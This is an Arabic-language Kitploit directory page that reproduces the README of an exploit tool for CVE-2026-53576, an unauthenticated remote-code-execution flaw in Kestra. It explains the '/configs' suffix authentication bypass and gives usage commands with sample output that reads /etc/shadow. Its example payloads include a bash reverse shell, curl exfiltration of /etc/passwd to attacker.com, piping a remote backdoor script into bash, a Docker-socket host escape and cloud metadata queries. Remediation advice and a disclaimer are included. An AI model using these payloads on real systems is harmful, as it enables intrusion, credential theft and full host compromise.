Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-53576 — Kestra Unauthenticated RCE Exploit (CVE-2026-53576) | Kitploit
أدوات/GitHubGitHub/tamatahyt/cve-2026-53576
Authentication & AuthorizationPrivilege EscalationExploitationWeb Application ExploitationData ExfiltrationPost-ExploitationPenetration TestingRed TeamingPayload DevelopmentContainer Escape
GitHubtamatahyt/cve-2026-53576
منذ 19 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-53576

Kestra Unauthenticated RCE Exploit (CVE-2026-53576)

عرض المستودع

استغلال ثغرة تنفيذ الأوامر عن بُعد بدون مصادقة في Kestra (CVE-2026-53576)

Python License Security Kestra

تجاوز حرج للمصادقة يؤدي إلى تنفيذ أوامر عن بُعد بدون مصادقة

الاستغلال • تفاصيل الثغرة • الأثر • الإصلاح


⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمن المصرح بها فقط.

  • لا تستخدمها ضد أنظمة لا تملكها أو لا تملك إذنًا كتابيًا صريحًا لاختبارها.
  • لا تستخدمها في أنشطة غير قانونية.
  • المؤلف ليس مسؤولًا عن أي إساءة استخدام لهذه الأداة.
  • استخدمها على مسؤوليتك الخاصة.

📋 جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • استخدام الاستغلال
  • التثبيت
  • أمثلة
  • الأثر
  • الإصلاح
  • الخط الزمني
  • المراجع
  • الترخيص

🔍 نظرة عامة

CVE-2026-53576 هي ثغرة حرجة في Kestra OSS حتى الإصدار v1.3.20 تسمح بـ تنفيذ أوامر عن بُعد بدون مصادقة عبر تجاوز فلتر المصادقة.

التفاصيل الأساسية


🚨 تفاصيل الثغرة

السبب الجذري

يحتوي فلتر المصادقة في Kestra على خلل منطقي حرج:

root@kitploit:~
// Vulnerable code in AuthenticationFilter.java:53
boolean isConfigEndpoint = request.getPath().endsWith("/configs")

يتم التحقق مما إذا كانت أي طلبات API تنتهي بـ /configs بدلاً من مطابقة المسار المحدد، مما يسمح للمهاجمين بتجاوز المصادقة بإلحاق /configs بأي نقطة نهاية.

خطوات الاستغلال

  1. إنشاء flow خبيث → POST /api/v1/main/flows/configs (يتجاوز المصادقة)
  2. تشغيل التنفيذ → POST /api/v1/main/executions/configs/configs (يتجاوز المصادقة)
  3. تنفيذ الأوامر بصلاحيات root → اختراق كامل للنظام

النقاط النهائية المتأثرة

root@kitploit:~
# Any path ending in /configs bypasses authentication
/api/v1/main/flows/configs          # Create flows
/api/v1/main/executions/configs/configs  # Execute flows
/api/v1/{tenant}/flows/configs      # Any tenant
/api/v1/{tenant}/executions/configs/configs  # Any tenant

💻 استخدام الاستغلال

الاستخدام الأساسي

root@kitploit:~
python3 kestra_exploit.py <target_ip>

استخدام متقدم

root@kitploit:~
# Custom port
python3 kestra_exploit.py 192.168.1.100 -p 8080

# HTTPS
python3 kestra_exploit.py 192.168.1.100 --https

# Custom command
python3 kestra_exploit.py 192.168.1.100 -c "whoami && hostname"

# Check Docker socket access
python3 kestra_exploit.py 192.168.1.100 --docker-check

# Clean up after exploitation
python3 kestra_exploit.py 192.168.1.100 --cleanup

# Full attack with all options
python3 kestra_exploit.py 192.168.1.100 -p 8080 --docker-check --cleanup -c "id > /tmp/proof.txt"

خيارات الأوامر


📦 التثبيت

المتطلبات

root@kitploit:~
pip install requests

استنساخ المستودع

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-53576
cd CVE-2026-53576

التحقق من التثبيت

root@kitploit:~
python3 kestra_exploit.py --help

🎯 أمثلة

مثال 1: استغلال أساسي

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100

المخرجات:

root@kitploit:~
============================================================
Kestra Unauthenticated RCE Exploit
Security Research Tool - Authorized Use Only!
============================================================
[*] Target: 192.168.1.100:8080
[*] Protocol: http
============================================================

[Step 1] Creating malicious flow...
[*] Creating malicious flow at http://192.168.1.100:8080/api/v1/main/flows/configs
[*] Command: id > /tmp/proof.txt; cat /etc/shadow | head -1 >> /tmp/proof.txt
[+] Flow created successfully! (Status: 200)
[+] Flow revision: 26

[Step 2] Triggering execution...
[*] Triggering execution at http://192.168.1.100:8080/api/v1/main/executions/configs/configs
[+] Execution triggered successfully!
[+] Execution ID: 4nxNTHPk2WInfrnxQa6KF2
[+] Status: CREATED

[Step 3] Checking execution status...
[+] Execution status: SUCCESS
[*] Final status: SUCCESS

[+] Exploitation complete!
[*] To verify the attack succeeded, check the target system for:
    - /tmp/proof.txt containing command output
    - Kestra UI execution logs
    - Web UI: http://192.168.1.100:8080/ui/

مثال 2: قشرة عكسية

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

مثال 3: تسريب البيانات

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 -c "curl -X POST http://attacker.com/exfil -d @/etc/passwd"

مثال 4: فحص الهروب من Docker

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 --docker-check --cleanup

💥 الأثر

الأثر المباشر

القدرات الهجومية

يمكن للمهاجم غير المصادق أن:

  1. ينفّذ أوامر عشوائية بصلاحيات root:

    root@kitploit:~
    # Read secrets
    cat /app/conf/application.yml
    
    # Reverse shell
    bash -i >& /dev/tcp/attacker.com/4444 0>&1
    
    # Install malware
    curl http://attacker.com/backdoor.sh | bash
    
  2. ينتقل إلى النظام المضيف (إذا كان Docker socket مثبتًا):

    root@kitploit:~
    docker run -v /:/host --privileged alpine chroot /host
    
  3. يصل إلى بيانات cloud الوصفية (إذا كان يعمل على مزوّد سحابي):

    root@kitploit:~
    curl http://169.254.169.254/latest/meta-data/
    

🛡️ الإصلاح

إجراءات فورية

  1. إيقاف تشغيل النسخ المتأثرة:

    root@kitploit:~
    sudo systemctl stop kestra
    
  2. منع الوصول العام:

    root@kitploit:~
    iptables -A INPUT -p tcp --dport 8080 -j DROP
    
  3. تطبيق قواعد جدار الحماية:

    • الاقتصار على الشبكات الداخلية
    • استخدام VPN للوصول الإداري

الإصلاح الدائم

  1. تحديث Kestra إلى أحدث إصدار مصحح:

    • المتابعة: https://github.com/kestra-io/kestra
    • التحقق: https://github.com/kestra-io/kestra/security/advisories/GHSA-2q47-568g-9h4f
  2. تطبيق مصادقة مناسبة:

    • استخدام OAuth2/OIDC بدلاً من المصادقة الأساسية
    • تفعيل المصادقة متعددة العوامل
  3. تحسين أمان الحاوية:

    • التشغيل بمستخدم غير root
    • عدم تركيب /var/run/docker.sock
    • استخدام نظام ملفات جذر للقراءة فقط
  4. تحسين أمان الشبكة:

    • استخدام بوابة API مع توجيه مناسب
    • تنفيذ قواعد WAF
    • تفعيل التحقق من الطلبات

📅 الخط الزمني

التاريخالحدث
2026-05-26اكتشاف الثغرة
2026-06-03نشر النشرة الأمنية من Kestra
2026-06-10تخصيص CVE-2026-53576

📚 المراجع

  • النشرة الأمنية من Kestra GHSA-2q47-568g-9h4f
  • Huawei PSIRT
  • تفاصيل CVE-2026-53576
  • OWASP Top 10 - التحكم في الوصول المعطل

📄 الترخيص

root@kitploit:~
MIT License

Copyright (c) 2026 Security Researcher

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ الدعم

إذا وجدت هذه الأداة مفيدة:

  • ⭐ قم بنجم المستودع
  • 🐛 أبلغ عن المشكلات
  • 🔄 أرسل طلبات السحب
  • 📢 شارك بمسؤولية

🙏 شكر وتقدير

  • فريق Kestra لنشرتهم الأمنية
  • الباحثون الأمنيون الذين كشفوا عن هذه الثغرة
  • مجتمع الأمن مفتوح المصدر

⚠️ استخدم بمسؤولية ⚠️

الإبلاغ عن ثغرة • سياسة الأمن • اتصل بنا

تنزيل الأداة
الحقلالقيمة
معرّف CVECVE-2026-53576
الخطورةحرجة (9.8 CVSS)
نوع الثغرةتجاوز مصادقة + RCE
المنتج المتأثرKestra OSS
النسخ المتأثرة≤ v1.3.20
متجه الهجومشبكة
المصادقة المطلوبةلا شيء
تفاعل المستخدملا شيء
الخيارالوصف
targetعنوان IP أو اسم المضيف الهدف (مطلوب)
-p, --portالمنفذ (الافتراضي: 8080)
--httpsاستخدام HTTPS بدلاً من HTTP
-c, --commandالأمر المخصص للتنفيذ
--docker-checkالتحقق من الوصول إلى Docker socket
--cleanupحذف الـ flow بعد الاستغلال
--delayالتأخير بين الطلبات (الافتراضي: 2s)
الفئةالخطورةالوصف
السرية⚠️ حرجةقراءة أي ملف (كلمات المرور، الأسرار، الإعدادات)
السلامة⚠️ حرجةإنشاء/تعديل/حذف الـ flows والبيانات
التوافر⚠️ عاليةإيقاف النظام، استنزاف الموارد
المصادقة⚠️ حرجةتجاوز كامل للمصادقة الأساسية (Basic-Auth)
تصعيد الامتيازات⚠️ حرجةتنفيذ الأوامر بصلاحيات root (uid=0)
الهروب من الحاوية⚠️ حرجةاختراق المضيف عبر Docker socket
2026-06-15
الكشف العلني
2026-08-01نشر PoC